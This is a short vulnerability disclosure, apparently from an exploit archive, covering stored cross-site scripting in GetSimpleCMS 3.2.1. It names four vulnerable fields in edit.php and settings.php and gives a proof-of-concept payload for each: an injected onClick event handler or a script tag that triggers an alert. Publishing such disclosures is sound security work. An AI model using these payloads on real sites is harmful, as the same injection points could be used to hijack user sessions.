GetSimpleCMS Version 3.2.1 Stored XSS Vulnerability
===================================================================================
# Exploit Title: GetSimpleCMS Version 3.2.1 Stored XSS Vulnerability
# Download link :http://code.google.com/p/get-simple-cms/
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: 3.2.1
# Category: webapps
# Tested on: ubuntu 13.4
===================================================================================
Stored XSS Vulnerability:
Page: edit.php
Desc: inject your javascript code in "Page Title" field.
POC: test" onClick="alert(/HackedByAhmed-Elhady-Mohamed/)
Page: edit.php
Desc: click on page option then check "add this page to the menu" then inject your javascript code in "post-menu"" field.
POC: <script>alert(/HackedByAhmed-Elhady-Mohamed/)</script>
page: settings.php
Desc: inject javascript event in "Custom Permalink Structure" field
POC: test" onClick="alert(/HackedByAhmed-Elhady-Mohamed/)
page: settings.php
Desc: inject javascript event in "Display name" field
POC: test" onClick="alert(/HackedByAhmed-Elhady-Mohamed/)